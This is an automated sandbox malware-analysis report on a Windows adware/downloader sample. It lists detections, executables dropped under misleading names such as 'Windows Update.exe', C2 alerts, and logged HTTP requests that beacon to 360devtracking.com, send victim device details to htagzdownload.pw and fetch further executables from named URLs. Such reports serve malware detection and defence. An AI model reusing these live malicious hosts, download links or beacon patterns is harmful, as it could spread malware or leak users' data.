Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Avira: detection malicious, Label: TR/Dldr.Agent.pwjwe
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Avira: detection malicious, Label: HEUR/AGEN.1139393

Multi AV Scanner detection for submitted file

Source: 1nJGU59JPU.exe	Virustotal: Detection: 25%	Perma Link
Source: 1nJGU59JPU.exe	Metadefender: Detection: 31%	Perma Link
Source: 1nJGU59JPU.exe	ReversingLabs: Detection: 57%

Antivirus / Scanner detection for submitted sample

Source: 1nJGU59JPU.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Metadefender: Detection: 20%	Perma Link
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	ReversingLabs: Detection: 78%
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Metadefender: Detection: 34%	Perma Link
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	ReversingLabs: Detection: 77%

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.1.1nJGU59JPU.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.2.1nJGU59JPU.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.0.1nJGU59JPU.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49754 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49760 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49764 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 51.159.62.6:443 -> 192.168.2.3:49768 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50077 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:50416 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50854 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50856 version: TLS 1.0

Uses 32bit PE files

Source: 1nJGU59JPU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.3:50362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.148.61:443 -> 192.168.2.3:50399 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:50646 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.225:443 -> 192.168.2.3:50851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.164.165:443 -> 192.168.2.3:50853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.188:443 -> 192.168.2.3:50879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.71.70:443 -> 192.168.2.3:50883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.240:443 -> 192.168.2.3:50884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:50885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.210:443 -> 192.168.2.3:50887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.243:443 -> 192.168.2.3:50889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:50919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.210:443 -> 192.168.2.3:50920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.3:50930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.229:443 -> 192.168.2.3:50933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.27.252:443 -> 192.168.2.3:50935 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe.config	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic

Source: 1nJGU59JPU.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: updater.pdbh source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source:	Binary string: Publisher.pdbX source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp
Source:	Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb4 source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb` source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source:	Binary string: Recover.pdbh> source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb,"nbreDay": source: 7((_8888YTR(.exe, 00000003.00000002.324111810.0000000002E1A000.00000004.00000001.sdmp
Source:	Binary string: Recover.pdb source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source:	Binary string: I-Record.pdb8 source: 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source:	Binary string: updater.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source:	Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdbF source: 7((_8888YTR(.exe, 00000003.00000002.324177929.0000000002E4A000.00000004.00000001.sdmp
Source:	Binary string: I-Record.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb source: ZHunuhebaqu.exe, ZHunuhebaqu.exe, 00000014.00000002.361743821.0000000000512000.00000002.00020000.sdmp
Source:	Binary string: e:\mydev\inno-download-plugin\ansi\idp.pdb source: 1nJGU59JPU.tmp, 00000001.00000002.336506814.000000000018F000.00000004.00000001.sdmp
Source:	Binary string: Publisher.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00452AD4 FindFirstFileA,GetLastError,	1_2_00452AD4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_0046417C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_004645F8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,	1_2_00462BF0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_00498FDC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00475798 FindFirstFileA,FindNextFileA,FindClose,	1_2_00475798

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2032327 ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2 192.168.2.3:49778 -> 139.45.197.236:80
Source: Traffic	Snort IDS: 2032327 ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2 192.168.2.3:49776 -> 139.45.197.236:80
Source: Traffic	Snort IDS: 1948 DNS zone transfer UDP 192.168.2.3:57236 -> 34.64.183.91:53

Performs DNS queries to domains with low reputation

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

DNS query: www.cloud-security.xyz

Connects to many IPs within the same subnet mask (likely port scanning)

Source: global traffic

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 136Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22Acrons%22,%22ip%22:%22%22,%22country%22:%22CH%22,%22DateTime%22:%222022/01/14%2018:01%22,%22Device%22:%22835180%22,%22PCName%22:%22user%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lyla7_lylach7_irecord_goodchannel_registry_goodchannel_AdxpertMedia_Acrons%22,%22Os%22:%22WIN10%22,%22Browser%22:%22Chrome%22%7D HTTP/1.1Host: htagzdownload.pwConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 264Expect: 100-continueAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip

Downloads executable code via HTTP

Source: global traffic

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49754 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49760 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49764 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 51.159.62.6:443 -> 192.168.2.3:49768 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50077 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:50416 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50854 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50856 version: TLS 1.0

Connects to many different domains

Source: unknown

Network traffic detected: DNS query count 102

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

UDP traffic: 192.168.2.3:60138 -> 142.250.154.127:19302

Connects to several IPs in different countries

Source: unknown

Network traffic detected: IP country count 11

Source: 7((_8888YTR(.exe, 00000003.00000002.323750858.0000000002C9C000.00000004.00000001.sdmp	String found in binary or memory: http://360devtracking.com
Source: 7((_8888YTR(.exe, 00000003.00000002.323919834.0000000002D62000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.323595078.0000000002C01000.00000004.00000001.sdmp	String found in binary or memory: http://360devtracking.com/jkzhnzhedxagwdqp/suybdffapqeffezs
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.408064386.0000018BF0DB3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.398771103.0000018BF0DA9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400027194.0000018BF0DB2000.00000004.00000001.sdmp	String found in binary or memory: http://accounts.google.com/
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.408064386.0000018BF0DB3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.398771103.0000018BF0DA9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400027194.0000018BF0DB2000.00000004.00000001.sdmp	String found in binary or memory: http://accounts.google.com/r
Source: chrome.exe, 00000017.00000003.372345068.000001AC63EC6000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.380018041.000001AC60655000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390793589.000001AC60656000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396124354.0000018BEE694000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404252936.0000018BEE698000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400658455.0000018BEE697000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe-
Source: chrome.exe, 00000017.00000002.403234818.000001AC63EA4000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.387763712.000001AC63EA4000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.393863059.0000018BF1F07000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414108310.0000018BF1F07000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000017.00000002.403234818.000001AC63EA4000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.387763712.000001AC63EA4000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/time/1/currentL
Source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp	String found in binary or memory: http://cor-tips.com/Download/corTips.exe
Source: 7((_8888YTR(.exe, 00000003.00000002.323306891.0000000000C81000.00000004.00000020.sdmp, Kixysyshysy.exe, 0000000A.00000003.358368191.000000001C15F000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.399884161.000000001C15F000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.345782334.000000001C15F000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.377691490.000000001B980000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Kixysyshysy.exe, 0000000A.00000003.358368191.000000001C15F000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.399884161.000000001C15F000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.345782334.000000001C15F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.v
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe2
Source: Kixysyshysy.exe, 0000000A.00000003.324627509.000000001C4B5000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.328427516.000000001C4DF000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.324665647.000000001C4B5000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.328359092.000000001C4DD000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000003.324521098.000000001C4AF000.00000004.00000001.sdmp	String found in binary or memory: http://en.w
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357535577.000001AC6067E000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352521474.000001AC60679000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352904064.000001AC60683000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354928622.000001AC60686000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.388164041.000001AC6068A000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.351896441.000001AC60673000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354428587.000001AC60684000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358440114.000001AC60685000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.391374856.000001AC6068B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359537428.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.361364428.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354772182.0000018BEE6B9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396013581.0000018BEE6CA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354616344.0000018BEE6B5000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356225093.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355581746.0000018BEE6C3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404678337.0000018BEE6CB000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356869908.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355844714.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.378461475.0000020F7E59C000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358692142.0000020F7E5A7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358021122.0000020F7E5A6000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.ma)
Source: chrome.exe, 00000018.00000002.403138233.0000018BEE640000.00000004.00000020.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: chrome.exe, 00000017.00000003.377414613.000001AC60698000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.407796691.0000018BF0D90000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/
Source: ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe	String found in binary or memory: http://james.newtonking.com/projects/json
Source: 1nJGU59JPU.tmp, 00000001.00000003.335063356.0000000002214000.00000004.00000001.sdmp	String found in binary or memory: http://korolova.s3.nl-ams.scw.cloud/adv-control/I-Record.
Source: 1nJGU59JPU.tmp, 00000001.00000003.273779504.00000000021C8000.00000004.00000001.sdmp	String found in binary or memory: http://korolova.s3.nl-ams.scw.cloud/adv-control/I-Record.exe
Source: 1nJGU59JPU.tmp, 00000001.00000003.335063356.0000000002214000.00000004.00000001.sdmp	String found in binary or memory: http://korolova.s3.nl-ams.scw.cloud/adv-control/I-Record.exeL
Source: 1nJGU59JPU.tmp, 00000001.00000002.336506814.000000000018F000.00000004.00000001.sdmp	String found in binary or memory: http://mitrichsoftware.wordpress.comB
